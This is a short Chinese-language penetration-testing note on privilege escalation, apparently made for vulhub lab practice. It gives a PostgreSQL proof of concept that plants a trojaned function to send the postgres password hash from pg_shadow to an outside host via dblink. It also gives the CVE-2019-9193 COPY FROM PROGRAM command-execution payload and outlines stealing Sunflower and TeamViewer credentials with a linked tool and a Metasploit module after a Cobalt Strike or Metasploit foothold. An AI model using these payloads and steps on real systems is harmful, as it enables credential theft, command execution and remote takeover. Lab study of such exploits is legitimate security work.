0x01 postgresql提权
vulhub复现,直接搜索,有两种提权,一个2018的一个2019的。2018的前提条件是需要一个数据库普通用户权限即可需要执行sql查询,然后执行sql命令留一个后门,需要等待数据库的管理员操作数据库的时候上线。2019的漏洞需要管理员权限,直接再sql语句中执行系统命令;
2018-poc
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$ select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); SELECT pg_catalog.array_to_string($1,$2); $$ LANGUAGE SQL VOLATILE;
2019-poc
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
vulhub靶场复现步骤
https://vulhub.org/#/environments/postgres/CVE-2019-9193/
0x02 第三方提权
讲了cs上线后使用插件抓取向日葵或者是tv这种远控工具的识别码和密码进行远程的登录,相当于直接提权到本地用户了;
向日葵
向日葵抓取密文解密工具,使用python38运行
https://github.com/wafinfo/Sunflower_get_Password
teamviewer
步骤:生成msf后门,运行后门上线,运行teamviewer抓取密码的模块
模块名称为
run post/windows/gather/credentials/temviewer_passwords